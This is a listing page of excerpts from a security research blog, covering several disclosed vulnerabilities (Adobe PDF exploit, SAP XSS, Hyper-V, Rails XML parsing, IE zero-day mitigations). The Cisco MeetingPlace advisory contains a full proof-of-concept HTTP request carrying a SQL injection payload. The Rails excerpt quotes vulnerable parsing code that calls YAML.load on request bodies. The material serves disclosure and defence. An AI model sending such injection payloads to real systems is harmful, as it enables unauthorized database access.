Breaking

Analyzing a CVE-2013-3346/CVE-2013-5065 Exploit with peepdf

This is a guest post from Jose Miguel Esparza (@EternalTodo)

 

There are already some good blog posts talking about this exploit, but I think this is a really good example to show how peepdf works and what you can learn if you attend the workshop “Squeezing Exploit Kits and PDF Exploits” at Troopers14.  The mentioned exploit was using the Adobe Reader ToolButton Use-After-Free vulnerability to execute code in the victim’s machine and then the Windows privilege escalation 0day to bypass the Adobe sandbox and execute a new payload without restrictions.

Continue reading “Analyzing a CVE-2013-3346/CVE-2013-5065 Exploit with peepdf”

Continue reading
Breaking

XSS in SAP Netweaver

We just got credits for a flaw we found in SAP Netweaver. The issue is a reflected Cross-Site Scripting (XSS). It can be triggered in the administrative interface for the Internet Communication Manager (ICM) and Web Dispatcher. This means that the targets for this XSS will definitely be users with administrative privileges. This makes it especially juicy for an attacker. Continue reading “XSS in SAP Netweaver”

Continue reading
Breaking

Exploiting Hyper-V: How We Discovered MS13-092

During a recent research project we performed an in-depth security assessment of Microsoft’s virtualization technologies, including Hyper-V and Azure. While we already had experience in discovering security vulnerabilities in other virtual environments (e.g. here and here), this was our first research project on the Microsoft virtualization stack and we took care to use a structured evaluation strategy to cover all potential attack vectors.
Part of our research concentrated on the Hyper-V hypervisor itself and we discovered a critical vulnerability which can be exploited by an unprivileged virtual machine to crash the hypervisor and potentially compromise other virtual machines on the same physical host. This bug was recently patched, see MS13-092 and our corresponding post.
Continue reading “Exploiting Hyper-V: How We Discovered MS13-092”

Continue reading
Breaking

Analysis of Rails XML Parameter Parsing Vulnerability

This post tries to give an overview about the background and impact of the new Rails XML parameter parsing vulnerability patched today.

The bug

The root cause of the vulnerability is Rails handling of formatted parameters. In addition to standard GET and POST parameter formats, Rails can handle multiple different data encodings inside the body of POST requests. By default JSON and XML are supported. While support for JSON is widely used in production, the XML functionality does not seem to be known by many Rails developers.

XML parameter parsing

The code responsible for parsing these different data types is shown below:

# actionpack/lib/action_dispatch/middleware/params_parser.rb 
....
DEFAULT_PARSERS = {
      Mime::XML => : xml_simple,
      Mime::JSON => :json
    }
....
def parse_formatted_parameters(env)
        ...
        when Proc
          strategy.call(request.raw_post)
        when : xml_simple, : xml_node
          data = Hash.from_xml(request.raw_post) || {}
          data.with_indifferent_access
        when :yaml
          YAML.load(request.raw_post)
        when :json
          data = ActiveSupport::JSON.decode(request.raw_post)
          data = {:_json => data} unless data.is_a?(Hash)
          data.with_indifferent_access
        else
          false
        end
...

Continue reading “Analysis of Rails XML Parameter Parsing Vulnerability”

Continue reading
Breaking

SQL Injection in Cisco MeetingPlace

Cisco has released a security advisory for a vulnerability we discovered last year.
For comparison here is our original advisory to cisco:

Security Advisory for Cisco Unified Communications Solution
Release Date: 11/8/2012
Author: Daniel Mende
1 SUMMARY
Multiple critical SQL injections exist in Cisco unified meeting place.
2 AFFECTED PRODUCTS
The following Products have been tested as vulnerable so far:
Cisco Unified Meetingplace with the following modules:
• MeetingPlace Agent 7.1.1.9
• MeetingPlace Audio Service 7.1.1.8
• MeetingPlace Gateway SIM 7.1.1.2
• MeetingPlace Replication Service 7.1.1.9
• MeetingPlace Master Service 7.1.1.8
• MeetingPlace Extension 7.1.1.8
• MeetingPlace Authentication Filter 7.1.1.8
3 DETAILS
The following parameters are affected:
http://$IP/mpweb/scripts/mpx.dll [POST Parameter wcRecurMtgID]
4 VULNERABILITY SCORING
The severity rating based on CVSS Version 2:
Base Vector: (AV:N / AC:L / Au:S / C:P / I:P / A:P)
CVSS Version 2 Score: 6.5
Severity: Low
5 PROOF OF CONCEPT
POST /mpweb/scripts/mpx.dll HTTP/1.1
Host: 10.X.X.X
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://10.X.X.X/mpweb/scripts/mpx.dll
Cookie: cookies=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 571
SessionID=A40490A1-AB17-4C1E-BA4A-E3C5C90F62CA.1ED59E5C-A774-4546-8683-
AEB15D6FBD0D.55931857-6296-48ec-9434-3231c683c47d.ADadfjadlkeNmFhmplaihgkdDg
&wcMeetingID=&wcRecurMtgID=‘ or 1=1 —&URL0=wcBase.tpl&TXT0=Startseite&URL1=&
TXT1=&URL2=&TXT2=&URL3=&TXT3=&URL4=&TXT4=&URL5=&TXT5=&MtgCatToSearch=
%28all%2Bcategories%29&ML_PublicPosted=Yes&MtgIDToSearch=0000007&SchedulerID=
&wcRequest=&wcHash=&FormType=listmeetings&wcState=3&STPL=wcFindMtg.tpl&FTPL=
wcFindMtg.tpl&ML_List=MT_Today&ML_EndTime_Month=&ML_EndTime_Day=&ML_End
Time_Year=&ML_ShowContMtgs=Yes&SP_VLanguage=lang999i00

 

As we are at the topic of Cisco’s Unified Communications Solution, there is a lot more in the queue to come up, just be patient a little longer, it’ll be worth it (-;

 

cheers

/daniel

Continue reading
Breaking

Microsoft Advisory 2757760: Windows Internet Explorer Zero-Day Vulnerability

Actually a Windows Vulnerability (Microsoft Advisory 2757760) related to the Internet Explorer Version 7, 8 and 9 is in the news. Microsoft is aware of the problem, but there’s no patch available yet. We call this a 0-Day :-). Making the problem even worse, on monday reliable exploit code was released within the Metasploit project, so exploit code is already in the wild.

Basically Microsoft suggests two workarounds:

But both of them have some impact: EMET must be deployed before any usage (btw. EMET can be configured via Group Policies) and disabling Active X and Active Scripting might break some business relevant web sites (that can be added to the “Trusted Sites” Zone, but might produce major operational effort).

There are more possible mitigating controls, so let’s just summarize some ideas:

  • Use of alternative browser: if you have it deployed already, go for it :-). Otherwise we have the same deployment issue as with EMET.
  • Sandboxing/Application Virtualization: It’s the same as with the alternate browser, of you have it, go for it, otherwise it will be a long term project. And be aware that also Application Virtualization won’t address all issues (see the ERNW Newsletter 32 for details).
  • No local admin rights: This doesn’t protect from exploiting the vulnerability, but at least reduces the impact. We strictly recommend to check the local administrator group and remove all users that don’t rely on it for fulfilling their business tasks. And btw. this topic is not new ;-), see also ERNW Newsletter 4, published in 2004!
  • Blocking communication for the clients at the corporate firewall: Be aware that this doesn’t really work. Modern exploit code is able to use the corporate proxy infrastructure including authentication to circumvent this control. Metasploit has exploit payloads for this.
  • Disabling/Blocking Flash content: While potentially not strictly required for exploitation, at least in some of the exploits currently observed in the wild Adobe Flash plays a major role. So like discussed in  these Insinuator posts (1, 2 and 3), restricting the use of Adobe Flash would proactively prevent some known exploits from working. But the newly published Metasploit exploit doesn’t use Flash, so keep  in mind that this mitigating control can only be used in addition to other ones.

So for a short term mitigation we recommend the following (especially for corporate environments)

  1. Disabling Active X and Active Scripting via Group Policies
  2. Disable/block Flash content
  3. Remove unneeded local administrative privileges
  4. If available use alternative browser or EMET

For long term mitigation (might also be feasible in small environments as short term mitigation):

  1. Deploy EMET
  2. Evaluate possibilities of application sandboxing/virtualization
  3. Deploy alternative browser. Be aware that deploying a second browser might not be an option for big corporate environments (central management and supporting/maintaining additional software are the main reasons for this).

And finally DON’T PANIC ;-), start to address the problem in a professional way.

Hope that helps a bit
Michael

Continue reading
Breaking

VMSA-2011-0005: VMware vCenter Orchestrator remote code execution vulnerability

Reading this advisory I’m quite tempted to emit another rant on the relationship of heavy use of 3rd party components, lack of (security) quality assurance and services running at times where they’re not needed (see second workaround here). I’ll refrain  from that for today. Just wanted to let you know that the underlying vulnerability in Struts2 was initially discovered by Meder Kydyraliev who gives this talk at Troopers in two weeks. He’ll certainly describe the inner workings of this one, and others… 😉

Have a good one,

Enno

Continue reading
Breaking

MS10-063, Prevention

One of the four vulnerabilities rated “critical” from yesterday’s MS patchday, that is MS10-063, has an interesting “Workarounds” section as for MS Internet Explorer. There it’s stated:

“Disabling the support for the parsing of embedded fonts in Internet Explorer prevents this application from being used as an attack vector.”

which, according to the advisory, should/can be done by setting the “Font Downloading” parameter to “Disable”.

Which is exactly what this document suggests. So taking a preventive approach, once more, might have saved some concerns (“Will we be targeted by this one”) and patch/testing time…

Have a great day,

Enno

Continue reading
Breaking

Just a Quick Note on the Library Loading / Binary Planting Stuff

For those of you who missed it: Microsoft released the associated advisory yesterday, together with a hotfix introducing a new registry key that allows users to control the DLL search path algorithm. For a detailed explanation of the problem we refer to the excellent article on Ars Technica.

For the record: no, AV (anti-virus software) will – in most cases – not protect you from security problems related to this one. And, no, there is no easy patch for this one either.

Carefully reading the “Mitigating Factors” and “Workarounds” section in the MS advisory or this entry from our blog might provide ideas how to address this or similar stuff (in the future).

Wishing you all some sunny summer days,

Enno

Update: this article gives some more technical details and this one describes some real attack paths against popular applications. Sorry, guys, good luck with fighting this one with traditional AV…

Continue reading